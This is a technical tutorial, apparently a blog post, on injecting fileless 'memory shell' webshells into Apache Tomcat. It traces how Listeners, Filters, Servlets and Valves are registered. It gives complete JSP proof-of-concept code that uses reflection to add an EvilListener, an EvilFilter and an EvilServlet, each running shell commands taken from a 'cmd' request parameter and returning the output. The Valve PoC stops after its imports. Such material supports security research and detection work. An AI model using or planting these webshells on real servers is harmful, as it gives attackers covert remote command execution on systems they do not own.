Listener type

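As the name suggests, a Listener is an event listener. There are several kinds of Listener, including:

  • HttpSessionListener: listens for HttpSession creation and destruction events;
  • ServletRequestListener: listens for ServletRequest creation and destruction events;
  • ServletRequestAttributeListener: listens for attribute changes on a ServletRequest (attributes being added, replaced or removed, e.g. via ServletRequest.setAttribute());
  • ServletContextAttributeListener: listens for attribute changes on the ServletContext (e.g. via ServletContext.setAttribute()).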

Taking ServletRequestListener as an example, here is a demo:

import jakarta.servlet.ServletRequestEvent;
import jakarta.servlet.ServletRequestListener;
import jakarta.servlet.annotation.WebListener;

@WebListener
public class TestListener implements ServletRequestListener {
    @Override
    public void requestDestroyed(ServletRequestEvent sre) {
        System.out.println("requestDestroyed");
    }

    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        System.out.println("requestInitialized");
    }
}

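Debugging shows where it is invoked:

StandardContext#fireRequestInitEvent fetches the registered listeners and calls requestInitialized on each ServletRequestListener.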

Stepping into getApplicationEventListeners:

  public Object[] getApplicationEventListeners() {
      return this.applicationEventListenersList.toArray();
  }

We can see that listeners are stored in StandardContext#applicationEventListenersList:

  public void addApplicationEventListener(Object listener) {
      this.applicationEventListenersList.add(listener);
  }

so a listener can be added simply by calling addApplicationEventListener.
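
The dispatch side can be modeled in a few lines of plain Java. This is a hypothetical sketch, not Tomcat code: ContextModel and RequestListener are stand-ins, and it assumes that fireRequestInitEvent walks getApplicationEventListeners() and calls requestInitialized on every entry that implements the request-listener interface. What it illustrates is that anything appended to the list through addApplicationEventListener is picked up on the next request, with no other registration step.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical, self-contained model of request-listener dispatch.
// RequestListener and ContextModel are stand-ins, not Tomcat classes.
public class ListenerDispatchModel {

    // Stand-in for ServletRequestListener
    interface RequestListener {
        void requestInitialized(String uri);
    }

    static class ContextModel {
        // Mirrors applicationEventListenersList: a plain list of Object
        private final List<Object> applicationEventListenersList = new ArrayList<>();

        void addApplicationEventListener(Object listener) {
            applicationEventListenersList.add(listener);
        }

        Object[] getApplicationEventListeners() {
            return applicationEventListenersList.toArray();
        }

        // Same shape as fireRequestInitEvent: fetch all listeners, skip anything
        // that is not a request listener, call the rest in registration order
        void fireRequestInitEvent(String uri) {
            for (Object instance : getApplicationEventListeners()) {
                if (instance instanceof RequestListener) {
                    ((RequestListener) instance).requestInitialized(uri);
                }
            }
        }
    }

    // Runs one simulated request and returns the log of listener calls
    static List<String> simulate() {
        List<String> log = new ArrayList<>();
        ContextModel context = new ContextModel();
        context.addApplicationEventListener((RequestListener) uri -> log.add("first " + uri));
        context.addApplicationEventListener("not a listener"); // skipped by the instanceof check
        context.addApplicationEventListener((RequestListener) uri -> log.add("second " + uri));
        context.fireRequestInitEvent("/index.jsp");
        return log;
    }

    public static void main(String[] args) {
        System.out.println(simulate()); // [first /index.jsp, second /index.jsp]
    }
}
```

Because non-listener entries are filtered by type at dispatch time, the list itself can stay typed as Object.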

Full PoC:

<%@ page import="org.apache.catalina.connector.RequestFacade" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
    <%
        class EvilListener implements ServletRequestListener{
            @Override
            public void requestDestroyed(ServletRequestEvent sre) {
                ServletRequestListener.super.requestDestroyed(sre);
            }

            @Override
            public void requestInitialized(ServletRequestEvent sre) {
                try{
                    RequestFacade requestFacade = (RequestFacade) sre.getServletRequest();
                    Field requestField = RequestFacade.class.getDeclaredField("request");
                    requestField.setAccessible(true);
                    Request request = (Request) requestField.get(requestFacade);
                    Response resp = request.getResponse();
                    String cmd = request.getParameter("cmd");
                    if(cmd!=null){
                        try {
                            InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
                            InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
                            BufferedReader br = new BufferedReader(inputStreamReader);
                            String line = br.readLine();
                            String res = "";
                            while (line != null) {
                                res = res + line + '\n';
                                line = br.readLine();
                            }
                            resp.getWriter().write(res);
                        } catch (IOException e) {
                            throw new RuntimeException(e);
                        }
                    }
                } catch (Exception e){
                    System.out.println(e);
                }
            }
        }
        EvilListener evilListener = new EvilListener();
        Field reqfield = request.getClass().getDeclaredField("request");
        reqfield.setAccessible(true);
        Request req = (Request) reqfield.get(request);
        StandardContext standardContext = (StandardContext) req.getContext();
        standardContext.addApplicationEventListener(evilListener);
    %>
</body>
</html>

Filter type

Create a Filter and debug how it is created:

import jakarta.servlet.*;
import jakarta.servlet.annotation.WebFilter;

import java.io.IOException;
@WebFilter("/*")
public class TestFilter implements Filter {
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("doFilter");
        filterChain.doFilter(servletRequest, servletResponse);
    }

}

ApplicationFilterChain#filters is an array of ApplicationFilterConfig, and the filter chain itself is created in StandardWrapperValve#invoke:

ApplicationFilterChain filterChain = ApplicationFilterFactory.createFilterChain(request, wrapper, servlet);

Stepping into createFilterChain:

    public static ApplicationFilterChain createFilterChain(ServletRequest request, Wrapper wrapper, Servlet servlet) {
        if (servlet == null) {
            return null;
        } else {
            ApplicationFilterChain filterChain = null;
            if (request instanceof Request) {
                Request req = (Request)request;
                if (Globals.IS_SECURITY_ENABLED) {
                    filterChain = new ApplicationFilterChain();
                } else {
                    filterChain = (ApplicationFilterChain)req.getFilterChain();
                    if (filterChain == null) {
                        filterChain = new ApplicationFilterChain();
                        req.setFilterChain(filterChain);
                    }
                }
            } else {
                filterChain = new ApplicationFilterChain();
            }

            filterChain.setServlet(servlet);
            filterChain.setServletSupportsAsync(wrapper.isAsyncSupported());
            StandardContext context = (StandardContext)wrapper.getParent();
            filterChain.setDispatcherWrapsSameObject(context.getDispatcherWrapsSameObject());
            FilterMap[] filterMaps = context.findFilterMaps();
            if (filterMaps != null && filterMaps.length != 0) {
                DispatcherType dispatcher = (DispatcherType)request.getAttribute("org.apache.catalina.core.DISPATCHER_TYPE");
                String requestPath = null;
                Object attribute = request.getAttribute("org.apache.catalina.core.DISPATCHER_REQUEST_PATH");
                if (attribute != null) {
                    requestPath = attribute.toString();
                }

                String servletName = wrapper.getName();
                FilterMap[] var10 = filterMaps;
                int var11 = filterMaps.length;

                int var12;
                FilterMap filterMap;
                ApplicationFilterConfig filterConfig;
                for(var12 = 0; var12 < var11; ++var12) {
                    filterMap = var10[var12];
                    if (matchDispatcher(filterMap, dispatcher) && matchFiltersURL(filterMap, requestPath)) {
                        filterConfig = (ApplicationFilterConfig)context.findFilterConfig(filterMap.getFilterName());
                        if (filterConfig != null) {
                            filterChain.addFilter(filterConfig);
                        }
                    }
                }

                var10 = filterMaps;
                var11 = filterMaps.length;

                for(var12 = 0; var12 < var11; ++var12) {
                    filterMap = var10[var12];
                    if (matchDispatcher(filterMap, dispatcher) && matchFiltersServlet(filterMap, servletName)) {
                        filterConfig = (ApplicationFilterConfig)context.findFilterConfig(filterMap.getFilterName());
                        if (filterConfig != null) {
                            filterChain.addFilter(filterConfig);
                        }
                    }
                }

                return filterChain;
            } else {
                return filterChain;
            }
        }
    }

It first obtains the StandardContext through StandardContext context = (StandardContext)wrapper.getParent();

and then retrieves the FilterMap array from StandardContext through FilterMap[] filterMaps = context.findFilterMaps();

public FilterMap[] findFilterMaps() {
    return this.filterMaps.asArray();
}

A FilterMap holds a filterName and its urlPatterns (plus the dispatcher types it applies to).
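
The URL side of that match can be sketched as follows. It is a simplified, assumed reading of the servlet-specification pattern rules (exact match, "/*", "/prefix/*", "*.ext"), written from scratch; matchPattern and matchesAny are hypothetical names, and this is not the source of Tomcat's matchFiltersURL.

```java
import java.util.List;

// Simplified sketch of the URL-pattern rules a FilterMap's urlPatterns are
// tested with. Hypothetical names; not Tomcat's matchFiltersURL source.
public class FilterUrlMatch {

    static boolean matchPattern(String pattern, String path) {
        if (pattern.equals(path) || pattern.equals("/*")) {
            return true;                                   // exact match, or "match everything"
        }
        if (pattern.endsWith("/*")) {                      // path-prefix match, e.g. "/admin/*"
            String prefix = pattern.substring(0, pattern.length() - 2);
            return path.equals(prefix) || path.startsWith(prefix + "/");
        }
        if (pattern.startsWith("*.")) {                   // extension match, e.g. "*.jsp"
            int slash = path.lastIndexOf('/');
            int period = path.lastIndexOf('.');
            return period > slash && path.substring(period + 1).equals(pattern.substring(2));
        }
        return false;
    }

    // A FilterMap applies if any one of its patterns matches
    static boolean matchesAny(List<String> urlPatterns, String path) {
        for (String pattern : urlPatterns) {
            if (matchPattern(pattern, path)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        List<String> patterns = List.of("/admin/*", "*.do");
        System.out.println(matchesAny(patterns, "/admin/users"));   // true
        System.out.println(matchesAny(patterns, "/shop/cart.do"));  // true
        System.out.println(matchesAny(patterns, "/administrator")); // false
    }
}
```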

It then enters the following for loop:

  for(var12 = 0; var12 < var11; ++var12) {
      filterMap = var10[var12];
      if (matchDispatcher(filterMap, dispatcher) && matchFiltersURL(filterMap, requestPath)) {
          filterConfig = (ApplicationFilterConfig)context.findFilterConfig(filterMap.getFilterName());
          if (filterConfig != null) {
              filterChain.addFilter(filterConfig);
          }
      }
  }

findFilterConfig simply looks the name up in the filterConfigs map:

public FilterConfig findFilterConfig(String name) {
    return (FilterConfig)this.filterConfigs.get(name);
}

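If the current request path matches one of a filterMap's urlPatterns, the filterConfig is looked up in StandardContext by the filterMap's filterName and appended to filterChain. The second loop does the same for filterMaps that match by servlet name.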
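
A toy Java model of this assembly step and of how the resulting chain then runs. All names are hypothetical stand-ins, only the URL pass is modeled (the servlet-name pass is analogous), and URL matching is cut down to exact and "/*" patterns. It shows two properties of the loop above: filterMaps are visited in order, and a filterMap whose name has no entry in filterConfigs contributes nothing.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical model of createFilterChain plus chain execution; not Tomcat code.
public class FilterChainModel {

    // Stand-in for the Filter an ApplicationFilterConfig wraps
    interface SimpleFilter {
        void doFilter(List<String> log, Chain chain);
    }

    // Stand-in for FilterMap: a filter name plus one URL pattern
    static class FilterMapModel {
        final String filterName;
        final String urlPattern;

        FilterMapModel(String filterName, String urlPattern) {
            this.filterName = filterName;
            this.urlPattern = urlPattern;
        }
    }

    // Like ApplicationFilterChain: filters plus a position counter;
    // once every filter has passed the request on, the servlet runs
    static class Chain {
        private final List<SimpleFilter> filters = new ArrayList<>();
        private int pos = 0;

        void addFilter(SimpleFilter filter) {
            filters.add(filter);
        }

        void doFilter(List<String> log) {
            if (pos < filters.size()) {
                filters.get(pos++).doFilter(log, this);
            } else {
                log.add("servlet");
            }
        }
    }

    // Only "/*" and exact patterns, to keep the model short
    static boolean matchUrl(String pattern, String path) {
        return pattern.equals("/*") || pattern.equals(path);
    }

    // URL pass: a matching map contributes a filter only if its name resolves
    static Chain createFilterChain(List<FilterMapModel> filterMaps,
                                   Map<String, SimpleFilter> filterConfigs,
                                   String requestPath) {
        Chain chain = new Chain();
        for (FilterMapModel map : filterMaps) {
            if (matchUrl(map.urlPattern, requestPath)) {
                SimpleFilter config = filterConfigs.get(map.filterName);
                if (config != null) {
                    chain.addFilter(config);
                }
            }
        }
        return chain;
    }

    static List<String> simulate(String path) {
        Map<String, SimpleFilter> configs = new HashMap<>();
        configs.put("logFilter", (out, next) -> { out.add("logFilter"); next.doFilter(out); });
        configs.put("authFilter", (out, next) -> { out.add("authFilter"); next.doFilter(out); });
        List<FilterMapModel> maps = List.of(
                new FilterMapModel("logFilter", "/*"),
                new FilterMapModel("authFilter", "/admin"),
                new FilterMapModel("orphanFilter", "/*"));   // mapped, but no config registered
        List<String> log = new ArrayList<>();
        createFilterChain(maps, configs, path).doFilter(log);
        return log;
    }

    public static void main(String[] args) {
        System.out.println(simulate("/admin")); // [logFilter, authFilter, servlet]
        System.out.println(simulate("/index")); // [logFilter, servlet]
    }
}
```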

A filterConfig holds the filter instance and its filterDef.

That gives us a way to add a malicious filter dynamically:

obtain the StandardContext object and add our own filterMap, filterConfig and filterDef to it.

PoC:

<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="java.util.Map" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
    <%
        class EvilFilter implements Filter{

            @Override
            public void init(FilterConfig filterConfig) throws ServletException {
                Filter.super.init(filterConfig);
            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                String cmd = servletRequest.getParameter("cmd");
                InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
                InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
                BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
                String res = "";
                String line = bufferedReader.readLine();
                while(line != null){
                    res = res + line + '\n';
                    line = bufferedReader.readLine();
                }
                servletResponse.getWriter().write(res);
            }

            @Override
            public void destroy() {
                Filter.super.destroy();
            }
        }
        EvilFilter evilFilter = new EvilFilter();
        // Obtain the StandardContext
        Field reqfield = request.getClass().getDeclaredField("request");
        reqfield.setAccessible(true);
        Request req = (Request) reqfield.get(request);
        StandardContext standardContext = (StandardContext) req.getContext();
        // Create the FilterDef
        FilterDef filterDef = new FilterDef();
        filterDef.setFilterClass(evilFilter.getClass().getName());
        filterDef.setFilterName(evilFilter.getClass().getName());
        filterDef.setFilter(evilFilter);
        standardContext.addFilterDef(filterDef);
        // Create the FilterMap
        FilterMap filterMap = new FilterMap();
        filterMap.setFilterName(evilFilter.getClass().getName());
        filterMap.setDispatcher(DispatcherType.REQUEST.name());
        filterMap.addURLPattern("/*");
        standardContext.addFilterMapBefore(filterMap);
        // Create the ApplicationFilterConfig (its constructor is not public, hence reflection)
        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

        // Register the config in StandardContext#filterConfigs (a private field) so findFilterConfig finds it by name
        Field filterConfigsfield = standardContext.getClass().getDeclaredField("filterConfigs");
        filterConfigsfield.setAccessible(true);
        Map filterConfigs = (Map) filterConfigsfield.get(standardContext);
        filterConfigs.put(evilFilter.getClass().getName(),filterConfig);
    %>
</body>
</html>

Servlet type

A Context manages Wrappers, and each Wrapper in turn manages a Servlet instance.

Create a servlet, set a breakpoint at StandardWrapper#setServletClass, and step back up one frame to ContextConfig#configureContext:

        while(var35.hasNext()) {
            ServletDef servlet = (ServletDef)var35.next();
            Wrapper wrapper = this.context.createWrapper();
            if (servlet.getLoadOnStartup() != null) {
                wrapper.setLoadOnStartup(servlet.getLoadOnStartup());
            }

            if (servlet.getEnabled() != null) {
                wrapper.setEnabled(servlet.getEnabled());
            }

            wrapper.setName(servlet.getServletName());
            Map<String, String> params = servlet.getParameterMap();
            var7 = params.entrySet().iterator();

            while(var7.hasNext()) {
                Map.Entry<String, String> entry = (Map.Entry)var7.next();
                wrapper.addInitParameter((String)entry.getKey(), (String)entry.getValue());
            }

            wrapper.setRunAs(servlet.getRunAs());
            Set<SecurityRoleRef> roleRefs = servlet.getSecurityRoleRefs();
            Iterator var37 = roleRefs.iterator();

            while(var37.hasNext()) {
                SecurityRoleRef roleRef = (SecurityRoleRef)var37.next();
                wrapper.addSecurityReference(roleRef.getName(), roleRef.getLink());
            }

            wrapper.setServletClass(servlet.getServletClass());
            MultipartDef multipartdef = servlet.getMultipartDef();
            if (multipartdef != null) {
                long maxFileSize = -1L;
                long maxRequestSize = -1L;
                int fileSizeThreshold = 0;
                if (null != multipartdef.getMaxFileSize()) {
                    maxFileSize = Long.parseLong(multipartdef.getMaxFileSize());
                }

                if (null != multipartdef.getMaxRequestSize()) {
                    maxRequestSize = Long.parseLong(multipartdef.getMaxRequestSize());
                }

                if (null != multipartdef.getFileSizeThreshold()) {
                    fileSizeThreshold = Integer.parseInt(multipartdef.getFileSizeThreshold());
                }

                wrapper.setMultipartConfigElement(new MultipartConfigElement(multipartdef.getLocation(), maxFileSize, maxRequestSize, fileSizeThreshold));
            }

            if (servlet.getAsyncSupported() != null) {
                wrapper.setAsyncSupported(servlet.getAsyncSupported());
            }

            wrapper.setOverridable(servlet.isOverridable());
            this.context.addChild(wrapper);
        }

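This shows the Wrapper initialization flow clearly: context#createWrapper creates the wrapper, which is then configured (name, init parameters, servlet class and so on). One attribute worth noting is load-on-startup, a startup priority: when the context starts, only wrappers with a non-negative load-on-startup value are loaded eagerly, in ascending order; the others are loaded on their first request.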
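
The startup selection can be sketched like this. It is a hypothetical model, loosely based on the way StandardContext#loadOnStartup groups wrappers in a TreeMap keyed by their load-on-startup value; WrapperModel stands in for a real Wrapper and only carries a name and a priority.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.TreeMap;

// Hypothetical model of choosing which wrappers to load when a context starts:
// negative values are skipped (lazy loading), the rest load in ascending order.
public class LoadOnStartupModel {

    // Stand-in for org.apache.catalina.Wrapper
    static class WrapperModel {
        final String name;
        final int loadOnStartup;

        WrapperModel(String name, int loadOnStartup) {
            this.name = name;
            this.loadOnStartup = loadOnStartup;
        }
    }

    static List<String> startupOrder(List<WrapperModel> children) {
        // Group names by load-on-startup value; TreeMap iterates keys in ascending order
        TreeMap<Integer, List<String>> byPriority = new TreeMap<>();
        for (WrapperModel wrapper : children) {
            if (wrapper.loadOnStartup < 0) {
                continue;   // not loaded at startup
            }
            byPriority.computeIfAbsent(wrapper.loadOnStartup, k -> new ArrayList<>()).add(wrapper.name);
        }
        List<String> order = new ArrayList<>();
        for (List<String> names : byPriority.values()) {
            order.addAll(names);   // equal values keep declaration order
        }
        return order;
    }

    public static void main(String[] args) {
        List<WrapperModel> children = List.of(
                new WrapperModel("lazy", -1),
                new WrapperModel("second", 2),
                new WrapperModel("first", 0),
                new WrapperModel("alsoSecond", 2));
        System.out.println(startupOrder(children)); // [first, second, alsoSecond]
    }
}
```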

Once configured, the wrapper is added to StandardContext via context#addChild:

    public void addChild(Container child) {
        Wrapper oldJspServlet = null;
        if (!(child instanceof Wrapper)) {
            throw new IllegalArgumentException(sm.getString("standardContext.notWrapper"));
        } else {
            boolean isJspServlet = "jsp".equals(child.getName());
            if (isJspServlet) {
                oldJspServlet = (Wrapper)this.findChild("jsp");
                if (oldJspServlet != null) {
                    this.removeChild(oldJspServlet);
                }
            }

            super.addChild(child);
            if (isJspServlet && oldJspServlet != null) {
                String[] jspMappings = oldJspServlet.findMappings();

                for(int i = 0; jspMappings != null && i < jspMappings.length; ++i) {
                    this.addServletMappingDecoded(jspMappings[i], child.getName());
                }
            }

        }
    }

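addServletMappingDecoded is what maps a url-pattern to a servlet-name. Inside addChild it is only used to carry the old jsp servlet's mappings over to the replacement; for servlets declared in web.xml, ContextConfig#configureContext calls it once per servlet-mapping.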

The same process can also be seen in ApplicationContext#addServlet:

    private ServletRegistration.Dynamic addServlet(String servletName, String servletClass, Servlet servlet, Map<String, String> initParams) throws IllegalStateException {
        if (servletName != null && !servletName.equals("")) {
            if (!this.context.getState().equals(LifecycleState.STARTING_PREP)) {
                throw new IllegalStateException(sm.getString("applicationContext.addServlet.ise", new Object[]{this.getContextPath()}));
            } else {
                Wrapper wrapper = (Wrapper)this.context.findChild(servletName);
                if (wrapper == null) {
                    wrapper = this.context.createWrapper();
                    wrapper.setName(servletName);
                    this.context.addChild(wrapper);
                } else if (wrapper.getName() != null && wrapper.getServletClass() != null) {
                    if (!wrapper.isOverridable()) {
                        return null;
                    }

                    wrapper.setOverridable(false);
                }

                ServletSecurity annotation = null;
                if (servlet == null) {
                    wrapper.setServletClass(servletClass);
                    Class<?> clazz = Introspection.loadClass(this.context, servletClass);
                    if (clazz != null) {
                        annotation = (ServletSecurity)clazz.getAnnotation(ServletSecurity.class);
                    }
                } else {
                    wrapper.setServletClass(servlet.getClass().getName());
                    wrapper.setServlet(servlet);
                    if (this.context.wasCreatedDynamicServlet(servlet)) {
                        annotation = (ServletSecurity)servlet.getClass().getAnnotation(ServletSecurity.class);
                    }
                }

                if (initParams != null) {
                    Iterator var9 = initParams.entrySet().iterator();

                    while(var9.hasNext()) {
                        Map.Entry<String, String> initParam = (Map.Entry)var9.next();
                        wrapper.addInitParameter((String)initParam.getKey(), (String)initParam.getValue());
                    }
                }

                ServletRegistration.Dynamic registration = new ApplicationServletRegistration(wrapper, this.context);
                if (annotation != null) {
                    registration.setServletSecurity(new ServletSecurityElement(annotation));
                }

                return registration;
            }
        } else {
            throw new IllegalArgumentException(sm.getString("applicationContext.invalidServletName", new Object[]{servletName}));
        }
    }

That gives us a way to add a servlet dynamically: create a Wrapper with context#createWrapper, configure it, add it to StandardContext with context#addChild, and then map a URL path to the servlet name with context#addServletMappingDecoded.
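
A toy model of why both the addChild and the mapping step are needed: addChild makes the servlet known by name, but nothing routes to it until a pattern is mapped. ContextModel and its methods are hypothetical, only exact patterns are handled, and the rule that a mapping must name an existing child is an assumption modeled on the validation StandardContext appears to perform in addServletMappingDecoded.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;

// Toy model: children holds "wrappers" by servlet name, servletMappings maps a
// URL pattern to a servlet name. Hypothetical names; exact patterns only; a
// servlet is modeled as a function from request path to response body.
public class ServletMappingModel {

    static class ContextModel {
        private final Map<String, Function<String, String>> children = new HashMap<>();
        private final Map<String, String> servletMappings = new HashMap<>();

        // Analogue of addChild: makes the servlet known by name only
        void addChild(String name, Function<String, String> servlet) {
            children.put(name, servlet);
        }

        // Analogue of addServletMappingDecoded; assumed to reject unknown names
        void addServletMapping(String pattern, String name) {
            if (!children.containsKey(name)) {
                throw new IllegalArgumentException("No servlet named " + name);
            }
            servletMappings.put(pattern, name);
        }

        // Route a request path; "404" when no pattern maps to a servlet
        String dispatch(String path) {
            String name = servletMappings.get(path);
            return name == null ? "404" : children.get(name).apply(path);
        }
    }

    public static void main(String[] args) {
        ContextModel context = new ContextModel();
        context.addChild("HelloServlet", path -> "hello from " + path);
        System.out.println(context.dispatch("/hello")); // 404 (known by name, not yet mapped)
        context.addServletMapping("/hello", "HelloServlet");
        System.out.println(context.dispatch("/hello")); // hello from /hello
    }
}
```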

PoC:

<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="org.apache.catalina.Wrapper" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
<%
    class EvilServlet implements Servlet{
        @Override
        public void init(ServletConfig servletConfig) throws ServletException {

        }

        @Override
        public ServletConfig getServletConfig() {
            return null;
        }

        @Override
        public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
            String cmd = servletRequest.getParameter("cmd");
            InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
            InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
            BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
            String res = "";
            String line = bufferedReader.readLine();
            while(line != null){
                res = res + line + '\n';
                line = bufferedReader.readLine();
            }
            servletResponse.getWriter().write(res);
        }

        @Override
        public String getServletInfo() {
            return null;
        }

        @Override
        public void destroy() {

        }
    }
    EvilServlet evilServlet = new EvilServlet();
    Field reqfield = request.getClass().getDeclaredField("request");
    reqfield.setAccessible(true);
    Request req = (Request) reqfield.get(request);
    StandardContext standardContext = (StandardContext) req.getContext();
    Wrapper wrapper = standardContext.createWrapper();
    wrapper.setServletClass(evilServlet.getClass().getName());
    wrapper.setName(evilServlet.getClass().getSimpleName());
    wrapper.setServlet(evilServlet);
    wrapper.setLoadOnStartup(1);
    standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/evil",evilServlet.getClass().getSimpleName());
%>
</body>
</html>

Valve type

Tomcat uses a pipeline mechanism to process Requests and Responses.

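Tomcat defines two interfaces for this: Pipeline and Valve. The names describe the processing model well: data flows through the pipeline like water through a pipe, passing one valve after another.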

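Every Pipeline has a basic Valve, which always sits at the end (runs last) and encapsulates the actual request processing and response output. Pipeline provides an addValve method that adds new Valves before the basic one; they run in the order in which they were added.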
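
The ordering rule can be illustrated with a small linked-list model. PipelineModel, ValveModel and NamedValve are hypothetical stand-ins; addValve is assumed to splice the new valve in front of basic, the way StandardPipeline#addValve appears to, and each valve forwards the request by calling getNext().invoke(...).

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical model of a pipeline: valves form a singly linked list through
// getNext(); addValve inserts just before basic, so basic always runs last.
public class PipelineModel {

    static abstract class ValveModel {
        private ValveModel next;

        ValveModel getNext() { return next; }

        void setNext(ValveModel next) { this.next = next; }

        abstract void invoke(List<String> log);
    }

    // A valve that records its name and passes the request on
    static class NamedValve extends ValveModel {
        private final String name;

        NamedValve(String name) { this.name = name; }

        @Override
        void invoke(List<String> log) {
            log.add(name);
            if (getNext() != null) {
                getNext().invoke(log);   // hand off to the next valve
            }
        }
    }

    private ValveModel first;
    private final ValveModel basic;

    PipelineModel(ValveModel basic) {
        this.basic = basic;
    }

    void addValve(ValveModel valve) {
        if (first == null) {
            first = valve;
        } else {
            // Find the valve currently pointing at basic and splice in after it
            ValveModel current = first;
            while (current.getNext() != basic) {
                current = current.getNext();
            }
            current.setNext(valve);
        }
        valve.setNext(basic);
    }

    ValveModel getFirst() {
        return first != null ? first : basic;
    }

    static List<String> simulate() {
        PipelineModel pipeline = new PipelineModel(new NamedValve("basic"));
        pipeline.addValve(new NamedValve("A"));
        pipeline.addValve(new NamedValve("B"));
        List<String> log = new ArrayList<>();
        pipeline.getFirst().invoke(log);
        return log;
    }

    public static void main(String[] args) {
        System.out.println(simulate()); // [A, B, basic]
    }
}
```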

Each container level in Tomcat (Engine, Host, Context, Wrapper) has a basic Valve implementation (StandardEngineValve, StandardHostValve, StandardContextValve, StandardWrapperValve), and each also maintains its own Pipeline instance (StandardPipeline).

The Pipeline interface extends the Contained interface and provides various operations on Valves:

public interface Pipeline extends Contained {
    Valve getBasic();

    void setBasic(Valve var1);

    void addValve(Valve var1);

    Valve[] getValves();

    void removeValve(Valve var1);

    Valve getFirst();

    boolean isAsyncSupported();

    void findNonAsyncValves(Set<String> var1);
}

The Valve interface:

public interface Valve {
    Valve getNext();

    void setNext(Valve var1);

    void backgroundProcess();

    void invoke(Request var1, Response var2) throws IOException, ServletException;

    boolean isAsyncSupported();
}

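getNext returns the next Valve in the pipeline; a Valve passes the request on by calling getNext().invoke(request, response), much like FilterChain#doFilter in a filter chain.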

All four container levels in Tomcat extend ContainerBase, so a custom Valve can be added to the standard implementation of any of them.

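Once added, the Valve's invoke method is called during request processing: the chain starts in org.apache.catalina.connector.CoyoteAdapter#service, which invokes the first Valve of the Engine's pipeline, and each level's basic Valve then passes the request to the next level's pipeline.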
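
How the four levels hand off to each other can be sketched as follows. This is a deliberately simplified, hypothetical model: each ContainerModel runs its added valves and then its basic valve, and the basic valve's only job here is to enter the next level's pipeline (the assumed Engine to Host to Context to Wrapper flow). Real basic valves do more, such as selecting the target host or context.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical model of nested pipelines; names only echo Tomcat's container levels.
public class ContainerChainModel {

    static class ContainerModel {
        final String name;
        final ContainerModel child;                          // next level down, null for the Wrapper
        final List<String> addedValves = new ArrayList<>();  // custom valves, in insertion order

        ContainerModel(String name, ContainerModel child) {
            this.name = name;
            this.child = child;
        }

        // Run the added valves, then the basic valve, which enters the child's pipeline
        void invokePipeline(List<String> log) {
            for (String valve : addedValves) {
                log.add(name + ":" + valve);
            }
            log.add(name + ":basic");
            if (child != null) {
                child.invokePipeline(log);
            }
        }
    }

    static List<String> simulate() {
        ContainerModel wrapper = new ContainerModel("Wrapper", null);
        ContainerModel context = new ContainerModel("Context", wrapper);
        ContainerModel host = new ContainerModel("Host", context);
        ContainerModel engine = new ContainerModel("Engine", host);
        context.addedValves.add("custom");   // a valve added at the Context level
        List<String> log = new ArrayList<>();
        engine.invokePipeline(log);          // the entry point starts at the Engine
        return log;
    }

    public static void main(String[] args) {
        System.out.println(simulate());
        // [Engine:basic, Host:basic, Context:custom, Context:basic, Wrapper:basic]
    }
}
```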

So the approach for a Valve is: write a malicious Valve class, obtain the StandardPipeline object, and add the malicious Valve to it with addValve.

PoC:

<%@ page import="org.apache.catalina.valves.ValveBase" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.Pipeline" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
